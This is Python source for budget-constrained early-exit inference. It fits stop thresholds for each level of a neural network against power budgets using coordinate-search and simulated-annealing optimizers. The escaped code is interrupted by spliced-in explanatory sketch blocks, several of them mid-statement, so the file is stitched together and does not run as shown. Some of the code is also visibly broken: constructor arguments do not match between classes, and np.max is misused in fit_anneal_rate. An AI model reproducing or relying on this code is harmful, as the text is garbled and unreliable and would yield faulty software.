labels).astype(float)\n print('Level Accuracy: {0}'.format(np.average(y, axis=0)))\n\n return states, y, level_logits, labels, stop_outputs\n\n\ndef levels_to_execute(logistic_probs: np.ndarray, thresholds: np.ndarray) -> np.ndarray:\n # Compute the predictions based on this threshold setting. The level predictions are a 0/1\n # array which is 0 when we should NOT use this level and 1 when we should\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_predictions = (logistic_probs > expanded_thresholds).astype(int) # [S, B, L]\n\n # Based on these level predictions, we compute the number of levels for each batch sample\n level_idx = np.arange(start=0, stop=thresholds.shape[-1])\n mask = (1.0 - level_predictions) * BIG_NUMBER # Big number when incorrect, 0 when correct\n index_mask = mask + level_idx # [S, B, L]\n levels = np.min(index_mask, axis=-1) # [S, B]\n levels = np.minimum(levels, thresholds.shape[-1] - 1).astype(int) # Clip the output, [S, B]\n\n return levels\n\n\ndef adjust_thresholds(clf_predictions: np.ndarray, thresholds: np.ndarray, target_distribution: np.ndarray, precision: int) -> np.ndarray:\n fp_one = 1 << precision\n thresholds = np.copy(thresholds)\n num_levels = thresholds.shape[1]\n num_budgets = thresholds.shape[0]\n\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for level in range(num_levels):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n direction = 1 - 2 * (target_distribution[:, level] > level_fractions[:, level]).astype(float)\n\n i = 0\n while (direction * (target_distribution[:, level] - level_fractions[:, level]) <= 0).all() and i < fp_one:\n thresholds[:, level] += (direction / fp_one)\n thresholds = np.clip(thresholds, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n\n # Compute the approximate power and accuracy\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n i += 1\n\n thresholds[:, level] -= (direction / fp_one)\n final_levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = 
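import numpy as np

# A minimal, self-contained sketch of the masking trick in levels_to_execute
# above: levels that may not halt are pushed to a huge index, so the min picks
# the earliest level whose stop probability clears its threshold.
BIG = 1e7
probs = np.array([[[0.2, 0.9, 0.6]]])      # [S=1, B=1, L=3] stop probabilities
thresholds = np.array([[0.8, 0.8, 0.0]])   # [S=1, L=3]; last level always halts

halt = (probs > thresholds[:, None, :]).astype(int)
masked = (1 - halt) * BIG + np.arange(probs.shape[-1])
levels = np.minimum(masked.min(axis=-1), probs.shape[-1] - 1).astype(int)
assert levels[0, 0] == 1   # level 0 fails (0.2 <= 0.8); level 1 halts (0.9 > 0.8)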
np.vstack([np.bincount(final_levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n final_distribution = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n return thresholds\n\n\ndef level_errors(logistic_probs: np.ndarray, thresholds: np.ndarray, network_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Calculates the distribution of threshold errors for each model level. This is used purely for debugging.\n\n Args:\n logistic_probs: A [1, B, L] array of logistic regression probabilities.\n thresholds: A [S, L] array of learned thresholds\n network_predictions: A [1, B, L] array of 0/1 classifications for each level.\n \"\"\"\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_diff = logistic_probs - expanded_thresholds # [S, B, L]\n\n levels = levels_to_execute(logistic_probs, thresholds) # [S, B]\n\n for budget_idx, budget_thresholds in enumerate(thresholds): # [S]\n print(budget_thresholds)\n for level in range(thresholds.shape[1] - 1): # [L]\n is_incorrect = (1.0 - network_predictions[:, level]) # [B]\n is_correct = network_predictions[:, level] # [B]\n prob_diff = level_diff[budget_idx, :, level] # [B]\n chosen_levels = (levels[budget_idx, :] == level).astype(float) # [B]\n\n logistic_variance = np.square(np.std(logistic_probs[:, level]))\n logistic_avg = np.average(logistic_probs[:, level])\n\n incorrect_mask = is_incorrect * chosen_levels\n incorrect_diff = incorrect_mask * prob_diff\n avg_inc_diff = np.sum(incorrect_diff) / np.maximum(np.sum(incorrect_mask), SMALL_NUMBER)\n\n correct_mask = is_correct * chosen_levels\n correct_diff = correct_mask * prob_diff\n avg_cor_diff = np.sum(correct_diff) / np.maximum(np.sum(correct_mask), SMALL_NUMBER)\n\n print('Average Gap on Level {0}: Incorrect -> {1:.5f}, Correct -> {2:.5f}, Prob Avg (Var): {3:.5f} ({4:.5f})'.format(level, avg_inc_diff, avg_cor_diff, logistic_avg, logistic_variance))\n\n\ndef predictions_for_levels(model_predictions: np.ndarray, levels: np.ndarray, batch_idx: np.ndarray) -> np.ndarray:\n preds_per_sample: List[np.ndarray] = []\n for i in range(levels.shape[0]):\n level_pred = np.squeeze(model_predictions[batch_idx, levels[i, :]])\n preds_per_sample.append(level_pred)\n\n preds_per_sample = np.vstack(preds_per_sample) # [S, B]\n return preds_per_sample\n\n\ndef fit_anneal_rate(start_value: float, end_value: float, steps: int):\n return np.exp((1.0 / steps) * np.log(np.max(end_value, SMALL_NUMBER) / np.max(start_value, SMALL_NUMBER)))\n\n\n### Budget optimizer classes ###\n\nclass BudgetOptimizer:\n \n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, min_iter: int, patience: int, power: np.ndarray):\n self._num_levels = num_levels\n self._num_budgets = budgets.shape[0]\n self._budgets = budgets\n self._precision = precision\n self._trials = trials\n self._max_iter = max_iter\n self._patience = patience\n self._rand = np.random.RandomState(seed=42)\n self._thresholds = None\n self._min_iter = min_iter\n self._power = power\n\n def fit(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def evaluate(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def get_approx_power(self, levels: np.ndarray) -> np.ndarray:\n \"\"\"\n Approximates the power consumption given profiled power results.\n\n Args:\n levels: A [S, B] array of the levels for each sample (B) and budget (S)\n 
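import numpy as np

# A minimal, self-contained sketch of the fancy-indexing gather in
# predictions_for_levels above: for each budget, pull each sample's 0/1
# result at that sample's chosen exit level.
results = np.array([[0., 1., 1.],    # sample 0: wrong at level 0, right after
                    [1., 1., 1.]])   # sample 1: right everywhere
levels = np.array([[0, 0],           # budget 0 stops both samples at level 0
                   [2, 2]])          # budget 1 runs both to the last level
batch_idx = np.arange(results.shape[0])
per_budget = np.vstack([results[batch_idx, levels[s]] for s in range(len(levels))])
assert per_budget.tolist() == [[0.0, 1.0], [1.0, 1.0]]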
Returns:\n An [S] array containing the average power consumption for each budget thresholds.\n \"\"\"\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n normalized_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n approx_power = np.sum(normalized_level_counts * self._power, axis=-1).astype(float) # [S]\n return approx_power, normalized_level_counts\n\n\nclass SimulatedAnnealingOptimizer(BudgetOptimizer):\n\n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, patience: int, temp: float, anneal_rate: float):\n super().__init__(num_levels, budgets, precision, trials, max_iter, patience)\n self._max_iter = max_iter\n self._temp = temp\n self._anneal_rate = anneal_rate\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Initialize thresholds, [S, L] array\n thresholds = round_to_precision(self._rand.uniform(low=0.2, high=0.8, size=(self._num_budgets, self._num_levels)), self._precision)\n thresholds = np.flip(np.sort(thresholds, axis=-1), axis=-1)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Array of level indices\n level_idx = np.arange(start=0, stop=self._num_levels).reshape(1, 1, -1) # [1, 1, L]\n batch_idx = np.arange(start=0, stop=clf_predictions.shape[1]) # [B]\n\n # Variable for convergence\n early_stopping_counter = 0\n\n best_fitness = np.zeros(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n margin = 0.4\n temp = self._temp\n\n for i in range(self._max_iter):\n prev_thresholds = np.copy(thresholds)\n \n # Generate a random move\n random_move = round_to_precision(self._rand.uniform(low=-margin, high=margin, size=thresholds.shape), self._precision)\n random_move[:, -1] = 0\n\n candidate_thresholds = np.clip(thresholds + random_move, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=candidate_thresholds)\n\n # Compute the approximate power and accuracy\n approx_power, _ = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, VIOLATION_FACTOR * dual_term, -UNDERSHOOT_FACTOR * dual_term)\n\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n # Compute the fitness (we aim to maximize this objective)\n fitness = accuracy - dual_penalty\n\n # Determine when to set thresholds based on fitness and temperature\n random_move_prob = self._rand.uniform(low=0.0, high=1.0, size=(self._num_budgets, ))\n fitness_diff = fitness - best_fitness # [S]\n temperature_prob = np.exp(-1 * fitness_diff / temp)\n\n selection = np.logical_or(fitness_diff > 0, temperature_prob > random_move_prob)\n best_fitness = np.where(selection, fitness, best_fitness)\n best_power = np.where(selection, approx_power, best_power)\n thresholds = np.where(selection, candidate_thresholds, thresholds)\n\n # Anneal the temperature\n temp = temp * self._anneal_rate\n\n print('Completed iteration {0}: Fitness -> {1}'.format(i+1, best_fitness))\n\n if np.isclose(thresholds, prev_thresholds).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if 
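import numpy as np

# A minimal, self-contained sketch of get_approx_power above: the fraction of
# samples stopping at each level, dotted with the per-level power profile
# (the power numbers here are made up).
power = np.array([24.0, 48.0, 60.0])   # profiled mW per level
levels = np.array([[0, 0, 1, 2]])      # [S=1, B=4] chosen exit levels
counts = np.vstack([np.bincount(levels[s], minlength=3) for s in range(len(levels))])
fractions = counts / counts.sum(axis=-1, keepdims=True)   # [[0.5, 0.25, 0.25]]
approx_power = (fractions * power).sum(axis=-1)
assert np.isclose(approx_power[0], 0.5 * 24 + 0.25 * 48 + 0.25 * 60)   # 39.0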
early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n return thresholds\n\n\nclass CoordinateOptimizer(BudgetOptimizer):\n\n def fitness_function(self, thresholds: np.ndarray, network_results: np.ndarray, clf_predictions: np.ndarray, batch_size: int, violation_factor: float, undershoot_factor: float):\n # Compute the number of levels to execute\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds) # [B]\n\n # Compute the approximate power\n approx_power, normalized_level_counts = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, violation_factor, undershoot_factor) * np.square(dual_term)\n\n # Compute the accuracy\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return -accuracy + dual_penalty, approx_power\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n best_thresholds = np.ones(shape=(self._num_budgets, self._num_levels))\n best_fitness = np.ones(shape=(self._num_budgets, 1), dtype=float)\n\n # Reshape the validation arrays\n valid_clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for t in range(self._trials):\n print('===== Starting Trial {0} ====='.format(t))\n\n init_thresholds = np.random.uniform(low=MIN_INIT, high=MAX_INIT, size=(self._num_budgets, self._num_levels))\n init_thresholds = round_to_precision(init_thresholds, self._precision)\n init_thresholds = np.flip(np.sort(init_thresholds, axis=-1), axis=-1) # [S, L]\n\n thresholds = self.fit_single(network_results=network_results,\n clf_predictions=clf_predictions,\n init_thresholds=init_thresholds)\n\n # Compute the fitness\n fitness, _ = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=valid_clf_predictions,\n batch_size=valid_clf_predictions.shape[1],\n violation_factor=VIOLATION_FACTOR,\n undershoot_factor=UNDERSHOOT_FACTOR)\n fitness = np.expand_dims(fitness, axis=1)\n\n best_thresholds = np.where(fitness < best_fitness, thresholds, best_thresholds)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n print('Completed Trial {0}. 
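import numpy as np

# A minimal, self-contained sketch of the budget-penalised objective in
# fitness_function above: negated accuracy plus an asymmetric quadratic
# penalty on the gap between estimated power and the budget.
def demo_fitness(accuracy, approx_power, budget, violation=1.0, undershoot=0.01):
    gap = approx_power - budget
    penalty = np.where(gap > 0, violation, undershoot) * np.square(gap)
    return -accuracy + penalty   # the optimiser minimises this

# Overshooting the budget is punished far harder than undershooting it.
assert demo_fitness(0.9, 52.0, 50.0) > demo_fitness(0.9, 48.0, 50.0)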
Best Fitness: {1}'.format(t, best_fitness))\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n self._thresholds = best_thresholds\n return best_thresholds, avg_level_counts\n\n def print_accuracy_for_levels(self, clf_predictions: np.ndarray, network_results: np.ndarray, thresholds: np.ndarray):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n batch_idx = np.arange(levels.shape[1]) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n print('Level Counts: {0}'.format(avg_level_counts))\n\n # Calculate the accuracy for each level\n for i in range(self._num_levels):\n level_mask = (levels == i).astype(float) # [S, B]\n level_correct = np.sum(correct_per_level * level_mask, axis=-1) # [S]\n level_accuracy = level_correct / (np.sum(level_mask, axis=-1) + SMALL_NUMBER) # [S]\n\n print('Accuracy when stopping at level {0}: {1}'.format(i, level_accuracy))\n\n def evaluate(self, network_results: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Evaluates the already-fitted thresholds on the given data points.\n \"\"\"\n assert self._thresholds is not None, 'Must fit the optimizer first'\n\n # Compute the number of levels to execute per sample\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n # Compute the accuracy for each budget\n batch_size = network_results.shape[0]\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return accuracy\n\n def fit_single(self, network_results: np.ndarray, clf_predictions: np.ndarray, init_thresholds: np.ndarray) -> np.ndarray:\n \"\"\"\n Fits the optimizer to the given predictions of the logistic regression model and neural network model.\n\n Args:\n network_results: A [B, L] array of results for each sample and level in the neural network. 
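import numpy as np

# A minimal, self-contained sketch of the per-budget restart bookkeeping in
# fit above: keep, independently for each budget row, the thresholds whose
# fitness (lower is better) beats the best trial so far.
best_fit = np.array([[0.5], [0.2]])   # [S, 1]
best_thr = np.zeros((2, 3))           # [S, L]
trial_fit = np.array([[0.3], [0.4]])
trial_thr = np.ones((2, 3))
best_thr = np.where(trial_fit < best_fit, trial_thr, best_thr)
best_fit = np.where(trial_fit < best_fit, trial_fit, best_fit)
assert best_thr.tolist() == [[1, 1, 1], [0, 0, 0]]   # only budget 0 improved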
The results\n are 0/1 values indicating if this sample was classified correctly (1) or incorrectly (0)\n clf_predictions: A [B, L] array of classifications by the logistic regression model.\n patience: Number of trials without change to detect convergence.\n \"\"\"\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Copy the initial thresholds, [S, L] array\n thresholds = np.copy(init_thresholds)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Variable for convergence\n early_stopping_counter = 0\n prev_thresholds = np.copy(thresholds)\n\n # best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n # best_power = np.zeros_like(best_fitness)\n\n # Initialize penalty parameters\n violation_factor = 1e-4\n entropy_factor = 1e-4\n undershoot_factor = 1e-4\n\n violation_anneal_rate = fit_anneal_rate(start_value=violation_factor, end_value=VIOLATION_FACTOR, steps=self._min_iter)\n undershoot_anneal_rate = fit_anneal_rate(start_value=undershoot_factor, end_value=UNDERSHOOT_FACTOR, steps=self._min_iter)\n\n for i in range(self._max_iter):\n\n # Select a random level to run\n level = self._rand.randint(low=0, high=self._num_levels - 1)\n\n # [S] array of threshold values\n best_t = np.copy(thresholds[:, level]) # The 'best' are the previous thresholds at this level\n best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n \n # Create the start values to enable a interval of size [MARGIN] within [0, 1]\n fp_init = (best_t * fp_one).astype(int)\n end_values = np.minimum(fp_init + int((MARGIN + 1) / 2), fp_one)\n start_values = np.maximum(end_values - MARGIN, 0)\n\n # start_values = np.maximum((best_t * fp_one).astype(int) - int(MARGIN / 2), 0)\n\n # Variables for tie-breaking\n steps = np.zeros_like(best_fitness)\n prev_level_fitness = np.ones_like(best_fitness)\n prev_level_approx_power = np.zeros_like(best_power)\n current_thresholds = np.zeros_like(best_t) # [S]\n\n # print('Starting threshold: {0}'.format(best_t))\n\n for offset in range(MARGIN):\n\n # Compute the predictions using the threshold on the logistic regression model\n candidate_values = np.minimum((start_values + offset) / fp_one, 1)\n thresholds[:, level] = candidate_values\n\n # Compute the fitness\n fitness, approx_power = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=clf_predictions,\n batch_size=clf_predictions.shape[1],\n violation_factor=violation_factor,\n undershoot_factor=undershoot_factor)\n\n # print('Fitness: {0}, Candidate Value: {1}'.format(fitness, candidate_values))\n\n # Initialize variables on first iteration\n #if offset == 0:\n # prev_level_fitness = np.copy(fitness)\n # prev_level_approx_power = np.copy(approx_power)\n # current_thresholds = np.copy(thresholds[:, level])\n\n ## Set the best values at inflection points in the fitness\n #offset_condition = np.full(shape=fitness.shape, fill_value=(offset == MARGIN - 1 or offset == 0))\n #is_fitness_same = np.isclose(prev_level_fitness, fitness)\n\n #should_set = np.logical_and(prev_level_fitness <= best_fitness, \\\n # np.logical_or(np.logical_not(is_fitness_same), offset_condition))\n\n #median_thresholds = np.clip(current_thresholds + ((0.5 * steps).astype(int) / fp_one), a_min=0.0, a_max=1.0)\n #best_t = np.where(should_set, median_thresholds, best_t) # Set the thresholds to the median amount\n #best_power = 
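import numpy as np

# A minimal, self-contained sketch of the fixed-point grid fit_single walks:
# with `precision` fractional bits the search moves in steps of 1 / 2**precision,
# which is presumably what the imported round_to_precision helper snaps to.
def round_to_fixed(x, precision):
    fp_one = 1 << precision
    return np.round(np.asarray(x) * fp_one) / fp_one

assert round_to_fixed(0.333, 4) == 5 / 16      # nearest multiple of 1/16
assert round_to_fixed(0.333, 8) == 85 / 256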
np.where(should_set, prev_level_approx_power, best_power)\n #best_fitness = np.where(should_set, prev_level_fitness, best_fitness)\n\n ## If the fitness is equal to the previous fitness, then we add to the steps.\n ## Otherwise, we reset.\n #steps = np.where(np.isclose(prev_level_fitness, fitness), steps + 1, 0)\n\n ## Reset variables\n #current_thresholds = np.where(np.logical_not(is_fitness_same), thresholds[:, level], current_thresholds)\n #prev_level_fitness = np.copy(fitness)\n #prev_level_approx_power = np.copy(approx_power)\n\n best_t = np.where(fitness < best_fitness, candidate_values, best_t)\n best_power = np.where(fitness < best_fitness, approx_power, best_power)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n\n thresholds[:, level] = best_t # Set the best thresholds\n print('Completed Iteration: {0}: level {1}'.format(i, level))\n print('\\tBest Fitness: {0}'.format(-1 * best_fitness))\n print('\\tApprox Power: {0}'.format(best_power))\n # print('\\tThresholds: {0}'.format(thresholds))\n\n if i >= self._min_iter and (np.isclose(thresholds, prev_thresholds)).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n if i < self._min_iter:\n violation_factor = violation_factor * violation_anneal_rate\n undershoot_factor = undershoot_factor * undershoot_anneal_rate\n\n prev_thresholds = np.copy(thresholds)\n\n return thresholds\n\n\n### Model Controllers ###\n\nclass Controller:\n\n def __init__(self, model_path: str,\n dataset_folder: str,\n share_model: bool,\n precision: int,\n budgets: List[float],\n trials: int,\n power: np.ndarray,\n budget_optimizer_type: str,\n patience: int,\n max_iter: int,\n min_iter: int):\n self._model_path = model_path\n self._dataset_folder = dataset_folder\n\n # Load the model and dataset\n model, dataset, _ = get_serialized_info(model_path, dataset_folder=dataset_folder)\n\n self._model = model\n self._dataset = dataset\n self._is_fitted = False\n self._share_model = share_model\n self._num_levels = model.num_outputs\n\n self._budgets = np.array(budgets)\n self._num_budgets = len(self._budgets)\n self._precision = precision\n self._trials = trials\n self._thresholds = None\n self._patience = patience\n self._max_iter = max_iter\n self._min_iter = min_iter\n\n self._power = get_power_for_levels(power, self._num_levels)\n\n # Create the budget optimizer\n self._budget_optimizer_type = budget_optimizer_type.lower()\n if self._budget_optimizer_type == 'coordinate':\n self._budget_optimizer = CoordinateOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n elif self._budget_optimizer_type == 'sim-anneal':\n self._budget_optimizer = SimulatedAnnealingOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n temp=0.1,\n anneal_rate=0.95,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n else:\n raise ValueError('Unknown budget optimizer: {0}'.format(budget_optimizer_type))\n\n def fit(self, series: DataSeries):\n X_train, y_train, train_logits, train_labels, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n X_test, y_test, test_logits, test_labels, test_clf_predictions = fetch_model_states(self._model, self._dataset, series=DataSeries.TEST)\n\n # Fit the 
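import numpy as np

# A minimal, self-contained sketch of the geometric schedule produced by
# fit_anneal_rate above: pick a per-step rate r so start * r**steps hits the
# target value. (Note: the original guards its arguments with
# np.max(value, SMALL_NUMBER); as a scalar floor that would need np.maximum.)
def demo_anneal_rate(start, end, steps):
    return np.exp(np.log(end / start) / steps)

r = demo_anneal_rate(1e-4, 1e-2, 20)
assert np.isclose(1e-4 * r ** 20, 1e-2)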
thresholds\n self._thresholds, self._avg_level_counts = self._budget_optimizer.fit(network_results=y_train, clf_predictions=clf_predictions)\n \n # Evaluate the model optimizer\n print('======')\n train_acc = self._budget_optimizer.evaluate(network_results=y_train, clf_predictions=clf_predictions)\n test_acc = self._budget_optimizer.evaluate(network_results=y_test, clf_predictions=test_clf_predictions)\n\n print('Train Accuracy: {0}'.format(train_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_train, clf_predictions=clf_predictions, thresholds=self._thresholds)\n # level_errors(clf_predictions, self._thresholds, y_train)\n\n print('Test Accuracy: {0}'.format(test_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=self._thresholds)\n # level_errors(test_clf_predictions, self._thresholds, y_test)\n\n print('=====')\n\n # adjusted_thresholds = adjust_thresholds(test_clf_predictions, thresholds=self._thresholds, precision=self._precision, target_distribution=self._avg_level_counts)\n # print('Adjusted Test Accuracy:')\n # self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=adjusted_thresholds)\n\n self._is_fitted = True\n\n def score(self, series: DataSeries) -> np.ndarray:\n assert self._is_fitted, 'Model is not fitted'\n X, y, _, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n\n if self._share_model:\n X = X.reshape(-1, X.shape[-1])\n y = y.reshape(-1)\n\n accuracy = self._clf.score(X, y)\n else:\n total_accuracy = 0.0\n for level in range(self._model.num_outputs):\n total_accuracy += self._clf[level].score(X[:, level, :], y[:, level])\n\n accuracy = total_accuracy / self._model.num_outputs\n\n return accuracy\n\n def get_thresholds(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._thresholds[budget_idx]\n\n def get_avg_level_counts(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._avg_level_counts[budget_idx]\n\n def predict_sample(self, inputs: np.ndarray, budget: int, thresholds: Optional[np.ndarray] = None) -> int:\n \"\"\"\n Predicts the number of levels given the list of hidden states. The states are assumed to be in order.\n\n Args:\n inputs: An array of inputs for this sequence\n budget: The budget to perform inference under. This controls the employed thresholds.\n thresholds: Optional set of thresholds to use. 
This argument overrides the inferred thresholds.\n Returns:\n The number of levels to execute.\n \"\"\"\n assert self._is_fitted, 'Model is not fitted'\n\n # Get thresholds for this budget\n if thresholds is None:\n # Infer the thresholds for this budget\n thresholds = self.get_thresholds(budget)\n\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(self._model.num_outputs)]\n \n # Create the input feed dict\n seq_length = self._model.metadata[SEQ_LENGTH]\n num_sequences = self._model.num_sequences\n samples_per_seq = int(seq_length / num_sequences)\n feed_dict = dict()\n for i in range(self._model.num_outputs):\n input_ph = self._model.placeholders[get_input_name(i)]\n if self._model.model_type in (AdaptiveModelType.SAMPLE, AdaptiveModelType.BIDIR_SAMPLE, AdaptiveModelType.ADAPTIVE_NBOW):\n seq_indexes = list(range(i, seq_length, num_sequences))\n sample_tensor = inputs[seq_indexes]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n else: # Cascade\n start, end = i * samples_per_seq, (i+1) * samples_per_seq\n sample_tensor = inputs[start:end]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n\n # Supply dropout (needed for Adaptive NBOW)\n feed_dict[self._model.placeholders[DROPOUT_KEEP_RATE]] = 1.0\n\n model_result = self._model.execute(ops=stop_output_ops, feed_dict=feed_dict)\n for level, op_name in enumerate(stop_output_ops):\n stop_prob = model_result[op_name]\n\n if thresholds[level] < stop_prob:\n return level\n\n # By default, we return the top level\n return self._num_levels - 1\n\n def predict_levels(self, series: DataSeries, budget: float) -> Tuple[np.ndarray, np.ndarray]:\n assert self._is_fitted, 'Model is not fitted'\n\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n X, ypred, logits, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n level_predictions = np.argmax(logits, axis=-1) # [B, L]\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n batch_idx = np.arange(level_predictions.shape[0])\n predictions = predictions_for_levels(model_predictions=level_predictions,\n levels=levels,\n batch_idx=batch_idx)\n\n return levels[budget_idx].astype(int), predictions[budget_idx].astype(int)\n\n def as_dict(self):\n return {\n 'budgets': self._budgets,\n 'thresholds': self._thresholds,\n 'trials': self._trials,\n 'is_fitted': self._is_fitted,\n 'model_path': self._model_path,\n 'dataset_folder': self._dataset_folder,\n 'share_model': self._share_model,\n 'precision': self._precision,\n 'patience': self._patience,\n 'max_iter': self._max_iter,\n 'min_iter': self._min_iter,\n 'budget_optimizer_type': self._budget_optimizer_type,\n 'avg_level_counts': self._avg_level_counts\n }\n\n def save(self, output_file: Optional[str] = None):\n \"\"\"\n Serializes the model into a pickle file.\n \"\"\"\n # Create a default file name if none is given\n if output_file is None:\n save_folder, model_path = os.path.split(self._model_path)\n model_name = extract_model_name(model_path)\n output_file = os.path.join(save_folder, CONTROLLER_PATH.format(model_name))\n\n # Save the model components\n save_pickle_gz(self.as_dict(), output_file)\n\n @classmethod\n def load(cls, save_file: str):\n \"\"\"\n Loads the controller from the given serialized file.\n \"\"\"\n # Load the serialized information.\n serialized_info = read_pickle_gz(save_file)\n\n # Initialize the new 
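# A minimal, self-contained sketch of the early-exit rule in predict_sample
# above: run levels in order and stop at the first whose halt probability
# clears its threshold, falling through to the last level otherwise.
def demo_choose_level(stop_probs, thresholds):
    for level, (prob, threshold) in enumerate(zip(stop_probs, thresholds)):
        if threshold < prob:
            return level
    return len(stop_probs) - 1

assert demo_choose_level([0.1, 0.7, 0.4], [0.5, 0.5, 0.0]) == 1
assert demo_choose_level([0.1, 0.2, 0.3], [0.9, 0.9, 0.9]) == 2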
